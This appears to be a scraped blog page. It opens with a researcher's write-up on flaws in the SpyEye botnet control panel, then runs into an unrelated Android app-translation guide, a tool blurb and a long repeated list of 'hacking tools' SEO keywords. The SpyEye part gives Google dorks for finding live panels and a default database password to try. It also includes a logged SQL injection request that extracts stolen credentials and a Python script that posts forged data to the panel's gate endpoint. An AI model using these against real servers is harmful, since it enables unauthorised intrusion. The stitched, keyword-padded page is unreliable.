quarta-feira, 31 de maio de 2023

Attacking Financial Malware Botnet Panels - SpyEye

This is the second blog post in the "Attacking financial malware botnet panels" series. After playing with Zeus, my attention turned to another old (and dead) botnet, SpyEye. From an ITSEC perspective, SpyEye shares a lot of vulnerabilities with Zeus. 

The following report is based on SpyEye 1.3.45, which is old, and if we are lucky, the whole SpyEye branch will be dead soon. 

Google dorks to find SpyEye C&C server panel related stuff:

  • if the img directory gets indexed, it is rather easy, search for e.g. inurl:b-ftpbackconnect.png
  • if the install directory gets indexed, again, easy, search for e.g. inurl:spylogo.png
  • also, if you find a login screen, check the css file (style.css), and you see #frm_viewlogs, #frm_stat, #frm_botsmon_country, #frm_botstat, #frm_gtaskloader and stuff like that, you can be sure you found it
  • otherwise, it is the best not to Google for it, but get a SpyEye sample and analyze it
And this is how the control panel login looks like, nothing sophisticated:


The best part is that you don't have to guess the admin's username ;)

This is how an average control panel looks like:


Hack the Planet! :)

Boring vulns found (warning, an almost exact copy from the Zeus blog post)


  • Clear text HTTP login - you can sniff the login password via MiTM, or steal the session cookies
  • No password policy - admins can set up really weak passwords
  • No anti brute-force - you can try to guess the admin's password. There is no default username, as there is no username handling!
  • Password autocomplete enabled - boring
  • Missing HttpOnly flag on session cookie - interesting when combining with XSS
  • No CSRF protection - e.g. you can upload new exe, bin files, turn plugins on/off :-( boring. Also the file extension check can be bypassed, but the files are stored in the database, so no PHP shell this time. If you check the following code, you can see that even the file extension and type is checked, and an error is shown, but the upload process continues. And even if the error would stop the upload process, the check can be fooled by setting an invalid $uptype. Well done ...
        if ($_FILES['file']['tmp_name'] && ($_FILES['file']['size'] > 0))         {                 $outstr = "<br>";                 set_time_limit(0);                 $filename = str_replace(" ","_",$_FILES['file']['name']);                 $ext = substr($filename, strrpos($filename, '.')+1);                 if( $ext==='bin' && $uptype!=='config' ) $outstr .= "<font class='error'>Bad CONFIG extension!</font><br>";                 if( $ext==='exe' && $uptype!=='body' && $uptype!=='exe' ) $outstr .= "<font class='error'>Bad extension!</font><br>";                  switch( $uptype )                 {                 case 'body': $ext = 'b'; break;                 case 'config': $ext = 'c'; break;                 case 'exe': $ext = 'e'; break;                 default: $ext = 'e';                 }                 $_SESSION['file_ext'] = $ext;                 if( isset($_POST['bots']) && trim($_POST['bots']) !== '')                 {                         $bots = explode(' ', trim($_POST['bots']));                         //writelog("debug.log", trim($_POST['bots']));                         $filename .= "_".(LastFileId()+1);                 }                 if( FileExist($filename) ) $filename .= LastFileId();                 $tmpName  = $_FILES['file']['tmp_name'];                 $fileSize = $_FILES['file']['size'];                 $fileType = $_FILES['file']['type'];                 ## reading all file for calculating hash                 $fp = fopen($tmpName, 'r'); 
  • Clear text password storage - the MySQL passwords are stored in php files, in clear text. Also, the login password to the form panel is stored in clear text.
  • MD5 password - the passwords stored in MySQL are MD5 passwords. No PBKDF2, bcrypt, scrypt, salt, whatever. MD5. Just look at the pure simplicity of the login check, great work!
$query = "SELECT * FROM users_t WHERE uPswd='".md5($pswd)."'";
  • ClickJacking - really boring stuff

SQL injection


SpyEye has a fancy history of SQL injections. See details here, here, here, video here and video here.

It is important to highlight the fact that most of the vulnerable functions are reachable without any authentication, because these PHP files lack user authentication at the beginning of the files.

But if a C&C server owner gets pwned through this vuln, it is not a good idea to complain to the developer, because after careful reading of the install guide, one can see:

"For searching info in the collector database there is a PHP interface as formgrabber admin panel. The admin panel is not intended to be found on the server. This is a client application."

And there are plenty of reasons not to install the formgrabber admin panel on any internet reachable server. But this fact leads to another possible vulnerability. The user for this control panel is allowed to remotely login to the MySQL database, and the install guide has pretty good passwords to be reused. I mean it looks pretty secure, there is no reason not to use that.

CREATE USER 'frmcpviewer' IDENTIFIED BY 'SgFGSADGFJSDGKFy2763272qffffHDSJ'; 

Next time you find a SpyEye panel, and you can connect to the MySQL database, it is worth a shot to try this password.

Unfortunately the default permissions for this user is not enough to write files (select into outfile):

Access denied for user 'frmcpviewer' (using password: YES)

I also made a little experiment with this SQL injection vulnerability. I did set up a live SpyEye botnet panel, created the malware install binaries (droppers), and sent the droppers to the AV companies. And after more and more sandboxes connected to my box, someone started to exploit the SQL injection vulnerability on my server!

63.217.168.90 - - [16/Jun/2014:04:43:00 -0500] "GET /form/frm_boa-grabber_sub.php?bot_guid=&lm=3&dt=%20where%201=2%20union%20select%20@a:=1%20from%20rep1%20where%20@a%20is%20null%20union%20select%20@a:=%20@a%20%2b1%20union%20select%20concat(id,char(1,3,3,7),bot_guid,char(1,3,3,7),process_name,char(1,3,3,7),hooked_func,char(1,3,3,7),url,char(1,3,3,7),func_data)%20from%20rep2_20140610%20where%20@a=3%23 HTTP/1.1" 200 508 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)"

Although the query did not return any meaningful data to the attacker (only data collected from sandboxes), it raises some legal questions.

Which company/organization has the right to attack my server? 
  • police (having a warrant)
  • military (if we are at war)
  • spy agencies (always/never, choose your favorite answer)
  • CERT organisations?

But, does an AV company or security research company has the legal right to attack my server? I don't think so... The most problematic part is when they hack a server (without authorization), and sell the stolen information in the name of "intelligence service". What is it, the wild wild west?

The SQLi clearly targets the content of the stolen login credentials. If this is not an AV company, but an attacker, how did they got the SpyEye dropper? If this is an AV company, why are they stealing the stolen credentials? Will they notify the internet banking owners about the stolen credentials for free? Or will they do this for money?

And don't get me wrong, I don't want to protect the criminals, but this is clearly a grey area in the law. From an ethical point of view, I agree with hacking the criminal's servers. As you can see, the whole post is about disclosing vulns in these botnet panels. But from a legal point of view, this is something tricky ... I'm really interested in the opinion of others, so comments are warmly welcome.

On a side note, I was interested how did the "attackers" found the SpyEye form directory? Easy, they brute-forced it, with a wordlist having ~43.000 entries.

(Useless) Cross site scripting


Although parts of the SpyEye panel are vulnerable to XSS, it is unlikely that you will to find these components on the server, as these codes are part of the install process, and the installer fails to run if a valid install is found. And in this case, you also need the DB password to trigger the vuln...



Session handling


This is a fun part. The logout button invalidates the session only on the server side, but not on the client side. But if you take into consideration that the login process never regenerates the session cookies (a.k.a session fixation), you can see that no matter how many times the admin logs into the application, the session cookie remains the same (until the admin does not close the browser). So if you find a session cookie which was valid in the past, but is not working at the moment, it is possible that this cookie will be valid in the future ...

Binary server


Some parts of the SpyEye server involve running a binary server component on the server, to collect the form data. It would be interesting to fuzz this component (called sec) for vulns.

Log files revealed


If the form panel mentioned in the SQLi part is installed on the server, it is worth visiting the <form_dir>/logs/error.log file, you might see the path of the webroot folder, IP addresses of the admins, etc.

Reading the code


Sometimes reading the code you can find code snippets, which is hard to understand with a clear mind:

$content = fread($fp, filesize($tmpName)); if ( $uptype === 'config' )     $md5 = GetCRC32($content); else $md5 = md5($content); .... <script> if (navigator.userAgent.indexOf("Mozilla/4.0") != -1) {         alert("Your browser is not support yet. Please, use another (FireFox, Opera, Safari)");         document.getElementById("div_main").innerHTML = "<font class=\'error\'>ChAnGE YOuR BRoWsEr! Dont use BUGGED Microsoft products!</font>"; } </script> 

Decrypting SpyEye communication

It turned out that the communication between the malware and C&C server is not very sophisticated (Zeus does a better job at it, because the RC4 key stream is generated from the botnet password).

function DeCode($content) {         $res = '';         for($i = 0; $i < strlen($content); $i++)         {                 $num = ord($content[$i]);                 if( $num != 219) $res .= chr($num^219);         }         return $res; } 
Fixed XOR key, again, well done ...
This means that it is easy to create a script, which can communicate with the SpyEye server. For example this can be used to fill in the SpyEye database with crap data.


import binascii import requests import httplib, urllib  def xor_str(a, b):     i = 0     xorred = ''     for i in range(len(a)):         xorred += chr(ord(a[i])^b)     return xorred              b64_data= "vK6yv+bt9er17O3r6vqPnoiPjZb2i5j6muvo6+rjmJ/9rb6p5urr6O/j/bK+5uP16/Xs7evq9ers7urv/bSo5u316vXs7evq/a6v5pq/trK1/bi4qbjm453j6uPv7Or9tr/u5um+uuvpve3p7eq/4+vsveLi7Lnqvrjr6ujs7rjt7rns/au3vOa5sre3srW8s7q2tr6p4Lm3tLiw4LmuvKm+q7Spr+C4uPu8qbq5ub6p4Li4vKm6ubm+qeC4qb6/sq+8qbq54LiuqK+0tri0tbW+uK+0qeC/v7So4L+1qLqrsuC+trqyt7ypurm5vqngvb24vqmvvKm6ubm+qeC9/aivuq/mtLW3srW+" payload =xor_str (binascii.a2b_base64(b64_data), 219)  print ("the decrypted payload is: " + payload) params = (binascii.b2a_base64(xor_str(payload,219))) payload = {'data': params} r = requests.post("http://spyeye.localhost/spyeye/_cg/gate.php", data=payload) 

Morale of the story?


Criminals produce the same shitty code as the rest of the world, and thanks to this, some of the malware operators get caught and are behind bars now. And the law is behind the reality, as always.

More information


How To Automatically Translate Any Android App Into Any Language

There is the number of applications which are not having the features of translating apps to your favorite languages. This makes it difficult for the users to translate apps into their native language. Today, I am going to tell you about an application which will help you to Automatically Translate Any Android App into Any Language.
Nowadays there are around hundreds of application on play store which is having the feature of translate but some applications don't have this features. This is just because they don't have proper developers or sometimes translators.
There is an application launched by Akhil Kedia from XDA Developer which made it possible for all the users to translate the application to any language you need. This is something which everyone needs it.
Akhil Kedia built an Xposed module in which users can easily change the language of any application to whichever they like or love. Personally, we all love English language but there are peoples in many parts of the world they are suitable for other languages.
Automatically Translate Any Android App into Any Language
Automatically Translate Any Android App into Any Language

Automatically Translate Any Android App into Any Language

The best part about this Xposed Module is that it translates the application to any language whichever you like and there are around many languages which you can try it. The other best part about this application is that the user interface which is amazing.
In an Android application, the best thing is the user interface. This is something which helps users to download the module or application to run again and again. There are about many settings which can be changed from the application.
The setup process is a bit different from other applications but if you will look at the application you will definitely love it. Just because of too many settings and features available in the application and you can turn it to any language without any crashing issues of the application.

Requirements:

  • Rooted Android Phone
  • Xposed Framework installed on your phone.
  • Android 5.0 or higher.
  • Unknown Source enabled (You might be knowing it)
How to Automatically Translate Any Android App into Any Language
  • Download the module called as All Trans from here: Download
Automatically Translate Any Android App
  • Now, after installation, it will ask you to reboot your phone to activate the module
  • Now, you need to get the API Key to get it you need to sign up with Yandex first so sign up: Yandex Sign up
Automatically Translate Any Android App
  • Then after sign up you will get the API key just enter the API key in the All-Trans application.
Automatically Translate Any Android App
  • Open All Trans Application and the swipe right to Global Settings.
Automatically Translate Any Android App
  • Click on Enter Yandex Subscription key and then enter your key.
Automatically Translate Any Android App
  • In Global Settings click on Translate from and select the Language the application is already in. (Eg: English)
Automatically Translate Any Android App
  • Now, click on translate to and select your favorite language. This will change the language.
Automatically Translate Any Android App
  • Swipe left and select the applications which you need to translate and done.
Automatically Translate Any Android App
  • After selecting just open the application and the language is translated automatically.
Automatically Translate Any Android App

Final Words:

This is the best and easy way to Automatically Translate Any Android App into Any Language. I hope you love this article.Share this article with your friends and keep visiting for more tips and tricks like this and I will meet you in the next one.
Stay Updated Tune IemHacker

Related news


Samurai: Web Testing Framework


"The Samurai Web Testing Framework is a live linux environment that has been pre-configured to function as a web pen-testing environment. The CD contains the best of the open source and free tools that focus on testing and attacking websites. In developing this environment, we have based our tool selection on the tools we use in our security practice. We have included the tools used in all four steps of a web pen-test." read more...


Website: http://samurai.inguardians.com

Read more


  1. Hacker
  2. Hacking Tools Mac
  3. Hacking Tools For Games
  4. Pentest Tools Free
  5. Hacker
  6. Pentest Tools For Ubuntu
  7. Top Pentest Tools
  8. Hack Apps
  9. Pentest Tools Website
  10. Hack Website Online Tool
  11. Hack Tools
  12. Pentest Tools
  13. Hacking Tools 2020
  14. Hacking Tools Free Download
  15. Hacker Techniques Tools And Incident Handling
  16. Hacker Tools 2020
  17. Hacking Tools Usb
  18. Free Pentest Tools For Windows
  19. Best Pentesting Tools 2018
  20. Hacking Apps
  21. Hacker Tools
  22. Pentest Tools
  23. Pentest Reporting Tools
  24. Pentest Tools Apk
  25. Hack Tools Mac
  26. Hacker Tools 2020
  27. Hak5 Tools
  28. Tools For Hacker
  29. How To Make Hacking Tools
  30. Hacker Tools Hardware
  31. Hacking App
  32. Tools For Hacker
  33. Hacker Tool Kit
  34. Free Pentest Tools For Windows
  35. Pentest Tools Online
  36. Black Hat Hacker Tools
  37. New Hacker Tools
  38. Hacker Tools 2019
  39. How To Install Pentest Tools In Ubuntu
  40. Hacking Tools 2020
  41. Pentest Tools Linux
  42. Pentest Tools Apk
  43. Pentest Box Tools Download
  44. Hacking App
  45. Hackrf Tools
  46. Pentest Tools Nmap
  47. Tools 4 Hack
  48. Hackers Toolbox
  49. Hacker Techniques Tools And Incident Handling
  50. Nsa Hack Tools Download
  51. Pentest Tools For Mac
  52. Hack Tools For Ubuntu
  53. Hacking Tools Kit
  54. Hacking Apps
  55. Hacker Tools Hardware
  56. Hacking Tools Software
  57. Beginner Hacker Tools
  58. Hacking Tools Free Download
  59. Ethical Hacker Tools
  60. Hacker Tools Apk
  61. Hacking Tools Software
  62. Hak5 Tools
  63. Pentest Tools Github
  64. Pentest Tools Bluekeep
  65. Hacking Tools Github
  66. Hacking Tools For Windows
  67. Free Pentest Tools For Windows
  68. Hackrf Tools
  69. Hacking Tools Free Download
  70. Hacker Tools Apk
  71. Pentest Tools Open Source
  72. Hacker Tools For Mac
  73. Pentest Tools For Mac
  74. How To Install Pentest Tools In Ubuntu
  75. Kik Hack Tools
  76. Hacking Tools Usb
  77. Hacking Tools For Windows
  78. Hack Tools
  79. Hacker Tools List
  80. Hack Tools For Pc
  81. Hacking Tools And Software
  82. Hacking Tools Usb
  83. Pentest Tools Find Subdomains
  84. Pentest Tools Port Scanner
  85. Pentest Reporting Tools
  86. Hacking Tools For Games
  87. Hacker Tools For Ios
  88. Hack Tool Apk No Root
  89. Hacker Tools Hardware
  90. Pentest Automation Tools
  91. Bluetooth Hacking Tools Kali
  92. Game Hacking
  93. Pentest Tools Open Source
  94. Hacker Tools For Ios
  95. Hacker Tools Github
  96. Kik Hack Tools
  97. Hacker Tools Software
  98. Hack Tool Apk
  99. Hack Tools For Pc
  100. Hacker Tools List
  101. Pentest Tools Url Fuzzer
  102. Hacking Tools Software
  103. Hacker Tools For Mac
  104. Hack Tools
  105. Pentest Tools Download
  106. Pentest Box Tools Download
  107. Pentest Tools Android
  108. Hacking Tools For Windows 7
  109. Hacker Tools For Windows
  110. Pentest Tools Website
  111. Hacker Tools List
  112. Hackers Toolbox
  113. Hacker Tools For Mac
  114. Hack Tools Online
  115. Pentest Tools Online
  116. Hacker Tools Windows
  117. Tools For Hacker
  118. Hacking Tools And Software
  119. Pentest Tools Online
  120. Hacker Tools Apk Download
  121. Pentest Tools Alternative
  122. Pentest Tools Free
  123. Game Hacking
  124. Pentest Tools Review
  125. Hacking Tools For Mac
  126. Hacking Tools 2020
  127. Tools Used For Hacking
  128. Hacker Security Tools
  129. Hackrf Tools
  130. Nsa Hacker Tools
  131. What Is Hacking Tools
  132. New Hack Tools
  133. Pentest Tools
  134. Best Hacking Tools 2020
  135. Github Hacking Tools
  136. Hacking Tools Download
  137. Hacking Tools Free Download
  138. Beginner Hacker Tools
  139. Pentest Automation Tools
  140. Bluetooth Hacking Tools Kali
  141. Hacking Tools 2020
  142. Pentest Tools Bluekeep
  143. Pentest Tools Kali Linux
  144. Best Pentesting Tools 2018
  145. Pentest Tools
  146. Hack Tools For Windows
  147. New Hacker Tools
  148. Hack Tools Online
  149. Tools For Hacker
  150. Hack Tools For Windows
  151. Android Hack Tools Github
  152. Computer Hacker
  153. Hack App
  154. Hacker Tools Free Download
  155. Pentest Tools List
  156. Hacker Tools Free Download
  157. Pentest Tools Url Fuzzer
  158. Hacker Tools Online
  159. Hacking Tools Software
  160. Pentest Tools Windows
  161. Hacker Search Tools
  162. What Is Hacking Tools
  163. Pentest Tools Github
  164. Hacker Tools For Pc
  165. Hak5 Tools
  166. Beginner Hacker Tools
  167. Hacker Tools Apk
  168. Top Pentest Tools